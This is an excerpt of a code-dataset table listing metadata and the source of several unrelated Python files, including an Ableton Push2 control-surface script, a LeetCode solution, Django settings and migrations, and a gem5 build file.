blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
616
| content_id
stringlengths 40
40
| detected_licenses
sequencelengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 777
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 149
values | src_encoding
stringclasses 26
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 3
10.2M
| extension
stringclasses 188
values | content
stringlengths 3
10.2M
| authors
sequencelengths 1
1
| author_id
stringlengths 1
132
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
e3e9af5d81885990ee71c8798f9aa4149ac348cc | 4e44c4bbe274b0a8ccca274f29c4140dfad16d5e | /Push2_MIDI_Scripts/decompiled 10.0.3b2 scripts/pushbase/touch_encoder_element.py | 3b6d6c7f03e0827f3f845147d727d984560865cd | [] | no_license | intergalacticfm/Push2_MIDI_Scripts | b48841e46b7a322f2673259d1b4131d2216f7db6 | a074e2337b2e5d2e5d2128777dd1424f35580ae1 | refs/heads/master | 2021-06-24T15:54:28.660376 | 2020-10-27T11:53:57 | 2020-10-27T11:53:57 | 137,673,221 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,161 | py | # uncompyle6 version 3.0.1
# Python bytecode 2.7 (62211)
# Decompiled from: Python 2.7.13 (default, Jan 19 2017, 14:48:08)
# [GCC 6.3.0 20170118]
# Embedded file name: c:\Jenkins\live\output\win_64_static\Release\python-bundle\MIDI Remote Scripts\pushbase\touch_encoder_element.py
# Compiled at: 2018-06-05 08:04:22
from __future__ import absolute_import, print_function, unicode_literals
from ableton.v2.control_surface.elements import TouchEncoderElement as TouchEncoderElementBase
class TouchEncoderObserver(object):
u""" Interface for observing the state of one or more TouchEncoderElements """
def on_encoder_touch(self, encoder):
pass
def on_encoder_parameter(self, encoder):
pass
class TouchEncoderElement(TouchEncoderElementBase):
u""" Class representing an encoder that is touch sensitive """
def __init__(self, undo_step_handler=None, delete_handler=None, *a, **k):
super(TouchEncoderElement, self).__init__(*a, **k)
self._trigger_undo_step = False
self._undo_step_open = False
self._undo_step_handler = undo_step_handler
self._delete_handler = delete_handler
self.set_observer(None)
return
def set_observer(self, observer):
if observer is None:
observer = TouchEncoderObserver()
self._observer = observer
return
def on_nested_control_element_value(self, value, control):
self._trigger_undo_step = value
if value:
param = self.mapped_parameter()
if self._delete_handler and self._delete_handler.is_deleting and param:
self._delete_handler.delete_clip_envelope(param)
else:
self.begin_gesture()
self._begin_undo_step()
self._observer.on_encoder_touch(self)
self.notify_touch_value(value)
else:
self._end_undo_step()
self._observer.on_encoder_touch(self)
self.notify_touch_value(value)
self.end_gesture()
def connect_to(self, parameter):
if parameter != self.mapped_parameter():
self.last_mapped_parameter = parameter
super(TouchEncoderElement, self).connect_to(parameter)
self._observer.on_encoder_parameter(self)
def release_parameter(self):
if self.mapped_parameter() != None:
super(TouchEncoderElement, self).release_parameter()
self._observer.on_encoder_parameter(self)
return
def receive_value(self, value):
self._begin_undo_step()
super(TouchEncoderElement, self).receive_value(value)
def disconnect(self):
super(TouchEncoderElement, self).disconnect()
self._undo_step_handler = None
return
def _begin_undo_step(self):
if self._undo_step_handler and self._trigger_undo_step:
self._undo_step_handler.begin_undo_step()
self._trigger_undo_step = False
self._undo_step_open = True
def _end_undo_step(self):
if self._undo_step_handler and self._undo_step_open:
self._undo_step_handler.end_undo_step() | [
"[email protected]"
] | |
ed7db017e09ab445f8dc309bb5c7d7550dd29eca | c20f811f26afd1310dc0f75cb00992e237fdcfbd | /21-merge-two-sorted-lists.py | 2db2b0f72463bcc00edca0051683d4d4b8e84092 | [
"MIT"
] | permissive | dchentech/leetcode | 4cfd371fe4a320ab3e95925f1b5e00eed43b38b8 | 3111199beeaefbb3a74173e783ed21c9e53ab203 | refs/heads/master | 2022-10-21T09:59:08.300532 | 2016-01-04T03:21:16 | 2016-01-04T03:21:16 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,543 | py | """
Question:
Merge Two Sorted Lists
Merge two sorted linked lists and return it as a new list. The new list should be made by splicing together the nodes of the first two lists.
Performance:
1. Total Accepted: 82513 Total Submissions: 250918 Difficulty: Easy
2. Your runtime beats 93.72% of python submissions.
"""
# Definition for singly-linked list.
class ListNode(object):
def __init__(self, x):
self.val = x
self.next = None
class Solution(object):
def mergeTwoLists(self, l1, l2):
"""
:type l1: ListNode
:type l2: ListNode
:rtype: ListNode
"""
# Make everything easy, just take the next at the end.
dummy_head = ListNode(0)
curr_node = dummy_head
while l1 is not None and l2 is not None:
if l1.val < l2.val:
curr_node.next = l1
l1 = l1.next
else:
curr_node.next = l2
l2 = l2.next
curr_node = curr_node.next
curr_node.next = l1 or l2 # append the rest.
return dummy_head.next
n1 = ListNode(1)
n2 = ListNode(2)
n3 = ListNode(3)
n4 = ListNode(4)
n5 = ListNode(5)
n6 = ListNode(6)
n7 = ListNode(7)
n8 = ListNode(8)
n1.next = n3
n3.next = n5
n5.next = n7
n2.next = n4
n4.next = n6
n6.next = n8
result = Solution().mergeTwoLists(n1, n2)
assert result is n1
assert n1.next is n2
assert n2.next is n3
assert n3.next is n4
assert n4.next is n5
assert n5.next is n6
assert n6.next is n7
assert n7.next is n8
| [
"[email protected]"
] | |
63515d7070e6f6fa471eceafd23c5d19fc3aaec5 | 34d6f67245baf6b96915a39f2dff92ceb8652265 | /DjangoApp/settings.py | aa8dd1dce2fe8c302a621f08b64ec9e202771b94 | [
"MIT"
] | permissive | johnnynode/Django-1.11.11 | 917641dae0eeb892d8f61287b12357dffc6b1d15 | 421f4d23d2773a1338a5163605a2f29202c91396 | refs/heads/master | 2020-04-25T11:06:18.924593 | 2020-01-10T10:38:19 | 2020-01-10T10:38:19 | 172,733,799 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,341 | py | """
Django settings for DjangoApp project.
Generated by 'django-admin startproject' using Django 1.11.11.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.11/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'r043d-2qjdi=r7gj4jifc-$)g--ar7q3@huxk5rr&4#vu-pg9s'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = ['0.0.0.0']
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'app' # app.apps.AppConfig
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'DjangoApp.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'DjangoApp.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.11/ref/settings/#databases
DATABASES = {
'default': {
# 'ENGINE': 'django.db.backends.sqlite3',
# 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
'ENGINE': 'django.db.backends.mysql',
'NAME': 'mydb',
'USER': 'root',
'PASSWORD': '123456_mysql',
'HOST': 'localhost',
'PORT': '3306'
}
}
# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
LANGUAGE_CODE = 'zh-hans'
TIME_ZONE = 'Asia/Shanghai'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
STATIC_URL = '/static/' | [
"[email protected]"
] | |
04887e887daf35ff0170d6057274581be39394dd | f66a33f8cdd8286320da730be67c89ee00d83d8d | /src/python/SConscript | e7e464e2df48fb8aaf41a9bd57e412d6d013cb72 | [
"BSD-3-Clause",
"LicenseRef-scancode-proprietary-license",
"LGPL-2.0-or-later",
"MIT"
] | permissive | H2020-COSSIM/cgem5 | 0d5812632757e6146f7852c9bf4abe4e9628296a | 1222cc0c5618875e048f288e998187c236508a64 | refs/heads/main | 2023-05-13T14:08:01.665322 | 2023-05-08T08:39:50 | 2023-05-08T08:39:50 | 468,039,890 | 3 | 2 | BSD-3-Clause | 2022-10-12T14:29:33 | 2022-03-09T18:05:40 | C++ | UTF-8 | Python | false | false | 16,372 | # -*- mode:python -*-
# Copyright (c) 2004-2005 The Regents of The University of Michigan
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
Import('*')
PySource('gem5', 'gem5/__init__.py')
PySource('gem5', 'gem5/coherence_protocol.py')
PySource('gem5', 'gem5/isas.py')
PySource('gem5', 'gem5/runtime.py')
PySource('gem5.simulate', 'gem5/simulate/__init__.py')
PySource('gem5.simulate', 'gem5/simulate/simulator.py')
PySource('gem5.simulate', 'gem5/simulate/exit_event.py')
PySource('gem5.simulate', 'gem5/simulate/exit_event_generators.py')
PySource('gem5.components', 'gem5/components/__init__.py')
PySource('gem5.components.boards', 'gem5/components/boards/__init__.py')
PySource('gem5.components.boards', 'gem5/components/boards/abstract_board.py')
PySource('gem5.components.boards',
'gem5/components/boards/abstract_system_board.py')
PySource('gem5.components.boards', 'gem5/components/boards/mem_mode.py')
PySource('gem5.components.boards', 'gem5/components/boards/riscv_board.py')
PySource('gem5.components.boards.experimental',
'gem5/components/boards/experimental/__init__.py')
PySource('gem5.components.boards.experimental',
'gem5/components/boards/experimental/lupv_board.py')
PySource('gem5.components.boards', 'gem5/components/boards/simple_board.py')
PySource('gem5.components.boards', 'gem5/components/boards/test_board.py')
PySource('gem5.components.boards', 'gem5/components/boards/x86_board.py')
PySource('gem5.components.boards', 'gem5/components/boards/arm_board.py')
PySource('gem5.components.boards',
"gem5/components/boards/kernel_disk_workload.py")
PySource('gem5.components.boards',
"gem5/components/boards/se_binary_workload.py")
PySource('gem5.components.cachehierarchies',
'gem5/components/cachehierarchies/__init__.py')
PySource('gem5.components.cachehierarchies',
'gem5/components/cachehierarchies/abstract_cache_hierarchy.py')
PySource('gem5.components.cachehierarchies',
'gem5/components/cachehierarchies/abstract_two_level_cache_hierarchy.py')
PySource('gem5.components.cachehierarchies.chi',
'gem5/components/cachehierarchies/chi/__init__.py')
PySource('gem5.components.cachehierarchies.chi',
'gem5/components/cachehierarchies/chi/private_l1_cache_hierarchy.py')
PySource('gem5.components.cachehierarchies.chi.nodes',
'gem5/components/cachehierarchies/chi/nodes/__init__.py')
PySource('gem5.components.cachehierarchies.chi.nodes',
'gem5/components/cachehierarchies/chi/nodes/abstract_node.py')
PySource('gem5.components.cachehierarchies.chi.nodes',
'gem5/components/cachehierarchies/chi/nodes/directory.py')
PySource('gem5.components.cachehierarchies.chi.nodes',
'gem5/components/cachehierarchies/chi/nodes/dma_requestor.py')
PySource('gem5.components.cachehierarchies.chi.nodes',
'gem5/components/cachehierarchies/chi/nodes/private_l1_moesi_cache.py')
PySource('gem5.components.cachehierarchies.chi.nodes',
'gem5/components/cachehierarchies/chi/nodes/memory_controller.py')
PySource('gem5.components.cachehierarchies.classic',
'gem5/components/cachehierarchies/classic/__init__.py')
PySource('gem5.components.cachehierarchies.classic',
'gem5/components/cachehierarchies/classic/'
'abstract_classic_cache_hierarchy.py')
PySource('gem5.components.cachehierarchies.classic',
'gem5/components/cachehierarchies/classic/no_cache.py')
PySource('gem5.components.cachehierarchies.classic',
'gem5/components/cachehierarchies/classic/private_l1_cache_hierarchy.py')
PySource('gem5.components.cachehierarchies.classic',
'gem5/components/cachehierarchies/classic/'
'private_l1_private_l2_cache_hierarchy.py')
PySource('gem5.components.cachehierarchies.classic',
'gem5/components/cachehierarchies/classic/'
'private_l1_shared_l2_cache_hierarchy.py')
PySource('gem5.components.cachehierarchies.classic.caches',
'gem5/components/cachehierarchies/classic/caches/__init__.py')
PySource('gem5.components.cachehierarchies.classic.caches',
'gem5/components/cachehierarchies/classic/caches/l1dcache.py')
PySource('gem5.components.cachehierarchies.classic.caches',
'gem5/components/cachehierarchies/classic/caches/l1icache.py')
PySource('gem5.components.cachehierarchies.classic.caches',
'gem5/components/cachehierarchies/classic/caches/l2cache.py')
PySource('gem5.components.cachehierarchies.classic.caches',
'gem5/components/cachehierarchies/classic/caches/mmu_cache.py')
PySource('gem5.components.cachehierarchies.ruby',
'gem5/components/cachehierarchies/ruby/__init__.py')
PySource('gem5.components.cachehierarchies.ruby',
'gem5/components/cachehierarchies/ruby/abstract_ruby_cache_hierarchy.py')
PySource('gem5.components.cachehierarchies.ruby',
'gem5/components/cachehierarchies/ruby/mesi_two_level_cache_hierarchy.py')
PySource('gem5.components.cachehierarchies.ruby',
'gem5/components/cachehierarchies/ruby/mi_example_cache_hierarchy.py')
PySource('gem5.components.cachehierarchies.ruby.caches',
'gem5/components/cachehierarchies/ruby/caches/__init__.py')
PySource('gem5.components.cachehierarchies.ruby.caches',
'gem5/components/cachehierarchies/ruby/caches/abstract_directory.py')
PySource('gem5.components.cachehierarchies.ruby.caches',
'gem5/components/cachehierarchies/ruby/caches/abstract_dma_controller.py')
PySource('gem5.components.cachehierarchies.ruby.caches',
'gem5/components/cachehierarchies/ruby/caches/abstract_l1_cache.py')
PySource('gem5.components.cachehierarchies.ruby.caches',
'gem5/components/cachehierarchies/ruby/caches/abstract_l2_cache.py')
PySource('gem5.components.cachehierarchies.ruby.caches.mesi_two_level',
'gem5/components/cachehierarchies/ruby/caches/mesi_two_level/__init__.py')
PySource('gem5.components.cachehierarchies.ruby.caches.mesi_two_level',
'gem5/components/cachehierarchies/ruby/caches/mesi_two_level/directory.py')
PySource('gem5.components.cachehierarchies.ruby.caches.mesi_two_level',
'gem5/components/cachehierarchies/ruby/caches/mesi_two_level/'
'dma_controller.py')
PySource('gem5.components.cachehierarchies.ruby.caches.mesi_two_level',
'gem5/components/cachehierarchies/ruby/caches/mesi_two_level/l1_cache.py')
PySource('gem5.components.cachehierarchies.ruby.caches.mesi_two_level',
'gem5/components/cachehierarchies/ruby/caches/mesi_two_level/l2_cache.py')
PySource('gem5.components.cachehierarchies.ruby.caches.mi_example',
'gem5/components/cachehierarchies/ruby/caches/mi_example/__init__.py')
PySource('gem5.components.cachehierarchies.ruby.caches.mi_example',
'gem5/components/cachehierarchies/ruby/caches/mi_example/directory.py')
PySource('gem5.components.cachehierarchies.ruby.caches.mi_example',
'gem5/components/cachehierarchies/ruby/caches/mi_example/'
'dma_controller.py')
PySource('gem5.components.cachehierarchies.ruby.caches.mi_example',
'gem5/components/cachehierarchies/ruby/caches/mi_example/l1_cache.py')
PySource('gem5.components.cachehierarchies.ruby.topologies',
'gem5/components/cachehierarchies/ruby/topologies/__init__.py')
PySource('gem5.components.cachehierarchies.ruby.topologies',
'gem5/components/cachehierarchies/ruby/topologies/simple_pt2pt.py')
PySource('gem5.components.memory', 'gem5/components/memory/__init__.py')
PySource('gem5.components.memory', 'gem5/components/memory/abstract_memory_system.py')
PySource('gem5.components.memory', 'gem5/components/memory/dramsim_3.py')
PySource('gem5.components.memory', 'gem5/components/memory/simple.py')
PySource('gem5.components.memory', 'gem5/components/memory/memory.py')
PySource('gem5.components.memory', 'gem5/components/memory/single_channel.py')
PySource('gem5.components.memory', 'gem5/components/memory/multi_channel.py')
PySource('gem5.components.memory', 'gem5/components/memory/hbm.py')
PySource('gem5.components.memory.dram_interfaces',
'gem5/components/memory/dram_interfaces/__init__.py')
PySource('gem5.components.memory.dram_interfaces',
'gem5/components/memory/dram_interfaces/ddr3.py')
PySource('gem5.components.memory.dram_interfaces',
'gem5/components/memory/dram_interfaces/ddr4.py')
PySource('gem5.components.memory.dram_interfaces',
'gem5/components/memory/dram_interfaces/gddr.py')
PySource('gem5.components.memory.dram_interfaces',
'gem5/components/memory/dram_interfaces/hbm.py')
PySource('gem5.components.memory.dram_interfaces',
'gem5/components/memory/dram_interfaces/hmc.py')
PySource('gem5.components.memory.dram_interfaces',
'gem5/components/memory/dram_interfaces/lpddr2.py')
PySource('gem5.components.memory.dram_interfaces',
'gem5/components/memory/dram_interfaces/lpddr3.py')
PySource('gem5.components.memory.dram_interfaces',
'gem5/components/memory/dram_interfaces/lpddr5.py')
PySource('gem5.components.memory.dram_interfaces',
'gem5/components/memory/dram_interfaces/wideio.py')
PySource('gem5.components.processors',
'gem5/components/processors/__init__.py')
PySource('gem5.components.processors',
'gem5/components/processors/abstract_core.py')
PySource('gem5.components.processors',
'gem5/components/processors/abstract_generator_core.py')
PySource('gem5.components.processors',
'gem5/components/processors/abstract_generator.py')
PySource('gem5.components.processors',
'gem5/components/processors/abstract_processor.py')
PySource('gem5.components.processors',
'gem5/components/processors/complex_generator_core.py')
PySource('gem5.components.processors',
'gem5/components/processors/complex_generator.py')
PySource('gem5.components.processors',
'gem5/components/processors/cpu_types.py')
PySource('gem5.components.processors',
'gem5/components/processors/gups_generator_core.py')
PySource('gem5.components.processors',
'gem5/components/processors/gups_generator.py')
PySource('gem5.components.processors',
'gem5/components/processors/gups_generator_ep.py')
PySource('gem5.components.processors',
'gem5/components/processors/gups_generator_par.py')
PySource('gem5.components.processors',
'gem5/components/processors/linear_generator_core.py')
PySource('gem5.components.processors',
'gem5/components/processors/linear_generator.py')
PySource('gem5.components.processors',
'gem5/components/processors/random_generator_core.py')
PySource('gem5.components.processors',
'gem5/components/processors/random_generator.py')
PySource('gem5.components.processors',
'gem5/components/processors/simple_core.py')
PySource('gem5.components.processors',
'gem5/components/processors/base_cpu_core.py')
PySource('gem5.components.processors',
'gem5/components/processors/simple_processor.py')
PySource('gem5.components.processors',
'gem5/components/processors/base_cpu_processor.py')
PySource('gem5.components.processors',
'gem5/components/processors/simple_switchable_processor.py')
PySource('gem5.components.processors',
'gem5/components/processors/switchable_processor.py')
PySource('gem5.utils', 'gem5/utils/simpoint.py')
PySource('gem5.components.processors',
'gem5/components/processors/traffic_generator_core.py')
PySource('gem5.components.processors',
'gem5/components/processors/traffic_generator.py')
PySource('gem5.prebuilt', 'gem5/prebuilt/__init__.py')
PySource('gem5.prebuilt.demo', 'gem5/prebuilt/demo/__init__.py')
PySource('gem5.prebuilt.demo', 'gem5/prebuilt/demo/x86_demo_board.py')
PySource('gem5.prebuilt.riscvmatched',
'gem5/prebuilt/riscvmatched/__init__.py')
PySource('gem5.prebuilt.riscvmatched',
'gem5/prebuilt/riscvmatched/riscvmatched_board.py')
PySource('gem5.prebuilt.riscvmatched',
'gem5/prebuilt/riscvmatched/riscvmatched_cache.py')
PySource('gem5.prebuilt.riscvmatched',
'gem5/prebuilt/riscvmatched/riscvmatched_processor.py')
PySource('gem5.prebuilt.riscvmatched',
'gem5/prebuilt/riscvmatched/riscvmatched_core.py')
PySource('gem5.resources', 'gem5/resources/__init__.py')
PySource('gem5.resources', 'gem5/resources/downloader.py')
PySource('gem5.resources', 'gem5/resources/md5_utils.py')
PySource('gem5.resources', 'gem5/resources/resource.py')
PySource('gem5.resources', 'gem5/resources/workload.py')
PySource('gem5.utils', 'gem5/utils/__init__.py')
PySource('gem5.utils', 'gem5/utils/filelock.py')
PySource('gem5.utils', 'gem5/utils/override.py')
PySource('gem5.utils', 'gem5/utils/requires.py')
PySource('gem5.utils.multiprocessing',
'gem5/utils/multiprocessing/__init__.py')
PySource('gem5.utils.multiprocessing',
'gem5/utils/multiprocessing/_command_line.py')
PySource('gem5.utils.multiprocessing',
'gem5/utils/multiprocessing/context.py')
PySource('gem5.utils.multiprocessing',
'gem5/utils/multiprocessing/popen_spawn_gem5.py')
PySource('', 'importer.py')
PySource('m5', 'm5/__init__.py')
PySource('m5', 'm5/SimObject.py')
PySource('m5', 'm5/core.py')
PySource('m5', 'm5/debug.py')
PySource('m5', 'm5/event.py')
PySource('m5', 'm5/main.py')
PySource('m5', 'm5/options.py')
PySource('m5', 'm5/params.py')
PySource('m5', 'm5/proxy.py')
PySource('m5', 'm5/simulate.py')
PySource('m5', 'm5/ticks.py')
PySource('m5', 'm5/trace.py')
PySource('m5.objects', 'm5/objects/__init__.py')
PySource('m5.stats', 'm5/stats/__init__.py')
PySource('m5.util', 'm5/util/__init__.py')
PySource('m5.util', 'm5/util/attrdict.py')
PySource('m5.util', 'm5/util/convert.py')
PySource('m5.util', 'm5/util/dot_writer.py')
PySource('m5.util', 'm5/util/dot_writer_ruby.py')
PySource('m5.util', 'm5/util/fdthelper.py')
PySource('m5.util', 'm5/util/multidict.py')
PySource('m5.util', 'm5/util/pybind.py')
PySource('m5.util', 'm5/util/terminal.py')
PySource('m5.util', 'm5/util/terminal_formatter.py')
PySource('m5.internal', 'm5/internal/__init__.py')
PySource('m5.internal', 'm5/internal/params.py')
PySource('m5.ext', 'm5/ext/__init__.py')
PySource('m5.ext.pyfdt', 'm5/ext/pyfdt/pyfdt.py')
PySource('m5.ext.pyfdt', 'm5/ext/pyfdt/__init__.py')
PySource('m5.ext.pystats', 'm5/ext/pystats/__init__.py')
PySource('m5.ext.pystats', 'm5/ext/pystats/serializable_stat.py')
PySource('m5.ext.pystats', 'm5/ext/pystats/abstract_stat.py')
PySource('m5.ext.pystats', 'm5/ext/pystats/group.py')
PySource('m5.ext.pystats', 'm5/ext/pystats/simstat.py')
PySource('m5.ext.pystats', 'm5/ext/pystats/statistic.py')
PySource('m5.ext.pystats', 'm5/ext/pystats/storagetype.py')
PySource('m5.ext.pystats', 'm5/ext/pystats/timeconversion.py')
PySource('m5.ext.pystats', 'm5/ext/pystats/jsonloader.py')
PySource('m5.stats', 'm5/stats/gem5stats.py')
Source('embedded.cc', add_tags=['python', 'm5_module'])
Source('importer.cc', add_tags=['python', 'm5_module'])
cc, hh = env.Blob('m5ImporterCode', 'importer.py')
Source(cc, add_tags=['python', 'm5_module'])
Source('pybind11/core.cc', add_tags='python')
Source('pybind11/debug.cc', add_tags='python')
Source('pybind11/event.cc', add_tags='python')
Source('pybind11/object_file.cc', add_tags='python')
Source('pybind11/stats.cc', add_tags='python')
SimObject('m5/objects/SimObject.py', sim_objects=['SimObject'],
enums=['ByteOrder'])
| [
"[email protected]"
] | ||
4c1bc83bd79f6d45d169909107af7299301e7b56 | 453daa2a6c0e7bcac5301b7a3c90431c44e8d6ff | /demos/blog_react/aiohttpdemo_blog/admin/posts.py | 38dce4938f8f41f6985ec3be6d0e7e39d1407c75 | [
"Apache-2.0"
] | permissive | Deniallugo/aiohttp_admin | c4f68df50267fc64e36b9283bfeb80cb426009da | effeced4f4cb0fa48143030cd7e55aa9012203ac | refs/heads/master | 2023-07-08T06:02:18.603089 | 2021-08-19T06:57:18 | 2021-08-19T06:57:18 | 296,005,355 | 1 | 0 | Apache-2.0 | 2021-08-19T06:57:19 | 2020-09-16T10:55:28 | null | UTF-8 | Python | false | false | 332 | py | from aiohttp_admin.contrib import models
from aiohttp_admin.backends.sa import PGResource
from .main import schema
from ..db import post
@schema.register
class Posts(models.ModelAdmin):
fields = ('id', 'title', 'pictures', 'backlinks', 'subcategory',)
class Meta:
resource_type = PGResource
table = post
| [
"[email protected]"
] | |
176cdd36e2826a520c211721a826defe7432b198 | ac2b3f97b4f2423a3724fbf9af69e362183f7f3a | /crimtech_final_project/crimsononline/newsletter/migrations/0004_auto_20160321_1749.py | eac989c6e541da79424f7b0e000948499959a6e7 | [] | no_license | cindyz8735/crimtechcomp | e4109855dd9a87fc11dd29fdf6bb81400c9ce97b | a9045ea79c73c7b864a391039799c2f22234fed3 | refs/heads/master | 2021-01-24T10:06:03.386553 | 2018-04-14T04:24:57 | 2018-04-14T04:24:57 | 123,037,281 | 0 | 0 | null | 2018-02-26T22:08:57 | 2018-02-26T22:08:56 | null | UTF-8 | Python | false | false | 1,045 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('newsletter', '0003_auto_20150826_0229'),
]
operations = [
migrations.CreateModel(
name='HarvardTodaySponsoredEvent',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('time', models.CharField(default=b'', max_length=20)),
('description', models.TextField(default=b'')),
],
),
migrations.AddField(
model_name='harvardtodaynewsletter',
name='others_list',
field=models.TextField(default=b'', blank=True),
),
migrations.AddField(
model_name='harvardtodaysponsoredevent',
name='newsletter',
field=models.ForeignKey(related_name='sponsored_events', to='newsletter.HarvardTodayNewsletter'),
),
]
| [
"[email protected]"
] | |
6d360f0233028c91624e539874a5429b1c382233 | 127e99fbdc4e04f90c0afc6f4d076cc3d7fdce06 | /2021_하반기 코테연습/boj14620.py | 7d9fc8ac42f2639b3e07a9a9888085fed91330c1 | [] | no_license | holim0/Algo_Study | 54a6f10239368c6cf230b9f1273fe42caa97401c | ce734dcde091fa7f29b66dd3fb86d7a6109e8d9c | refs/heads/master | 2023-08-25T14:07:56.420288 | 2021-10-25T12:28:23 | 2021-10-25T12:28:23 | 276,076,057 | 3 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,341 | py | n = int(input())
mapp = []
for _ in range(n):
tmp = list(map(int, input().split()))
mapp.append(tmp)
check = [[False for _ in range(n)] for _ in range(n)]
answer = 1e10
dx = [1, -1, 0, 0]
dy = [0, 0, -1, 1]
def check_range(x, y):
if x>=0 and x<n and y>=0 and y<n:
return True
return False
def check_find(x, y):
global dx, dy
for i in range(4):
nx, ny = x+dx[i], y+dy[i]
if not check_range(nx, ny) or check[nx][ny]:
return False
return True
def get_sum(x, y):
global dx, dy
s = mapp[x][y]
for i in range(4):
nx, ny = x+dx[i], y+dy[i]
s+=mapp[nx][ny]
return s
def getSol(cur, cnt):
global answer, dx, dy
if cnt==3:
answer = min(answer, cur)
return
for i in range(n):
for j in range(n):
if not check[i][j] and check_find(i, j):
tmp= mapp[i][j]
for k in range(4):
nx, ny = i+dx[k], j+dy[k]
check[nx][ny] = True
tmp+=mapp[nx][ny]
getSol(cur+tmp, cnt+1)
for k in range(4):
nx, ny = i+dx[k], j+dy[k]
check[nx][ny] = False
getSol(0, 0)
print(answer) | [
"[email protected]"
] | |
f4654a97d2589c028a6eb4ff6fc813d361ca27b5 | 93ab050518092de3a433b03744d09b0b49b541a6 | /iniciante/Mundo 02/Exercícios Corrigidos/Exercício 036.py | 6859a806e2d4e38fc694507fed1fb3ea02e4c1a7 | [
"MIT"
